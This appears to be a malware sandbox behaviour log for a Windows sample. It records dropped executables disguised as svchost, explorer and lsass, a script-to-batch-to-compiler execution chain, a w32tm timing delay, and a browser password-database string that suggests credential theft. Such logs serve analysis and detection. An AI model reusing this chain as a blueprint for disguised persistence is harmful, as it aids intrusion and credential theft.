                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7016:120:WilError_03
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-I0F3xOgXin83Nkym1lQr
                                    Source: C:\Windows\debug\explorer.exeMutant created: NULL
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6416:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4852:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5876:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5072:120:WilError_03
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeFile created: C:\Users\user\AppData\Local\Temp\svchost.exeJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\blockhostnet\iXSXm.bat" "
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeProcess created: C:\Users\user\AppData\Local\Temp\explorer.exe
                                    Source: unknownProcess created: C:\Windows\debug\explorer.exe
                                    Source: unknownProcess created: C:\Windows\debug\explorer.exe
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeProcess created: C:\Users\user\AppData\Local\Temp\explorer.exeJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeCommand line argument: sfxname2_2_0084DF1E
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeCommand line argument: sfxstime2_2_0084DF1E
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeCommand line argument: STARTDLG2_2_0084DF1E
                                    Source: Zn0uX5K1ez.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: Zn0uX5K1ez.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.69%
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                    Source: conhost.exe, 00000015.00000002.3554414073.000000001BE72000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3554414073.000000001BE6A000.00000004.00000020.00020000.00000000.sdmp, AzFu3DMnII.21.dr, KBpeOZl6LK.21.dr, 8B9aVxycY9.21.dr, 5QWAKoy45Q.21.dr, J3zegzBECf.21.dr, 9nUVX9qu0n.21.dr, UjjiqG5BgE.21.dr, lWE4TC1R9e.21.dr, TY8wXaUeS2.21.dr, mWJ8NP0pgg.21.dr, aUDfp3N2kY.21.dr, Vk3Mw1W2Qt.21.dr, VyJoKrdJMr.21.dr, wQGTEPWHw7.21.dr, B91mR4iHlu.21.dr, C24CrujGfu.21.dr, b8i0avu0ST.21.dr, OHWh9jYDpn.21.dr, QAJjLADhO2.21.dr, ak3B5ey2Im.21.dr, 1DxqRxk8bq.21.dr, Br1PSAOT8a.21.dr, jS9YrnT28m.21.dr, 5o7cJ7Im4F.21.dr, o10jWHG1nh.21.dr, g0LcWYZoL5.21.dr, U787fSRxaR.21.dr, HVm4DAR9Q6.21.dr, X1XyXuc1da.21.dr, psvsWE0Pyu.21.dr, eRmxc4BNpu.21.dr, 4OIxrbYGAr.21.dr, 0Vly4rb0Si.21.dr, 3XlCUqcTzr.21.dr, ILxWYyh7K0.21.dr, TK1GnnCPbs.21.dr, gus8gVV6Z1.21.dr, 9WjvQxChlE.21.dr, DXmKq18qjf.21.dr, gQ6v8ORoA0.21.dr, kLpULUaATZ.21.dr, ew1vPjSH17.21.dr, ZEEkdFsWOI.21.dr, nhADnqzdYk.21.dr, rcdCKsYyfx.21.dr, 6EGHrLU0vt.21.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                                    Source: Zn0uX5K1ez.exeReversingLabs: Detection: 71%
                                    Source: Zn0uX5K1ez.exeVirustotal: Detection: 73%
                                    Source: unknownProcess created: C:\Users\user\Desktop\Zn0uX5K1ez.exe "C:\Users\user\Desktop\Zn0uX5K1ez.exe"
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeProcess created: C:\Users\user\AppData\Local\Temp\svchost.exe "C:\Users\user\AppData\Local\Temp\svchost.exe"
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeProcess created: C:\Users\user\AppData\Local\Temp\explorer.exe "C:\Users\user\AppData\Local\Temp\explorer.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\explorer.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\blockhostnet\dbHnJe8FTGPofdGpjq0jOMhg.vbe"
                                    Source: C:\Users\user\AppData\Local\Temp\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\blockhostnet\iXSXm.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\blockhostnet\msinto.exe "C:\blockhostnet/msinto.exe"
                                    Source: C:\blockhostnet\msinto.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bpgiaqs4\bpgiaqs4.cmdline"
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB3CA.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC35F53CF7FFB422D917B12E88668AC1.TMP"
                                    Source: C:\blockhostnet\msinto.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tcgkwiyn\tcgkwiyn.cmdline"
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB531.tmp" "c:\Windows\System32\CSCEBFD873D95F4D378C8CAFD01222E4F7.TMP"
                                    Source: C:\blockhostnet\msinto.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\klrkJh2DBx.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe "C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\conhost.exe"
                                    Source: unknownProcess created: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe "C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe"
                                    Source: unknownProcess created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
                                    Source: unknownProcess created: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe "C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\conhost.exe"
                                    Source: unknownProcess created: C:\Windows\debug\explorer.exe "C:\Windows\debug\explorer.exe"
                                    Source: unknownProcess created: C:\blockhostnet\msinto.exe "C:\blockhostnet\msinto.exe"
                                    Source: unknownProcess created: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe "C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe"
                                    Source: unknownProcess created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
                                    Source: unknownProcess created: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe "C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\conhost.exe"
                                    Source: unknownProcess created: C:\Windows\debug\explorer.exe "C:\Windows\debug\explorer.exe"
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeProcess created: C:\Users\user\AppData\Local\Temp\svchost.exe "C:\Users\user\AppData\Local\Temp\svchost.exe" Jump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeProcess created: C:\Users\user\AppData\Local\Temp\explorer.exe "C:\Users\user\AppData\Local\Temp\explorer.exe" Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\blockhostnet\dbHnJe8FTGPofdGpjq0jOMhg.vbe" Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c clsJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\blockhostnet\iXSXm.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\blockhostnet\msinto.exe "C:\blockhostnet/msinto.exe"Jump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bpgiaqs4\bpgiaqs4.cmdline"Jump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tcgkwiyn\tcgkwiyn.cmdline"Jump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\klrkJh2DBx.bat" Jump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB3CA.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC35F53CF7FFB422D917B12E88668AC1.TMP"Jump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB531.tmp" "c:\Windows\System32\CSCEBFD873D95F4D378C8CAFD01222E4F7.TMP"Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe "C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\conhost.exe"
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: dxgidebug.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: sfc_os.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: dwmapi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: riched20.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: usp10.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: msls31.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: textinputframework.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: policymanager.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: pcacli.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\explorer.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\explorer.exeSection loaded: msvcp140.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\explorer.exeSection loaded: vcruntime140.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\explorer.exeSection loaded: vcruntime140.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\explorer.exeSection loaded: vcruntime140.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: version.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
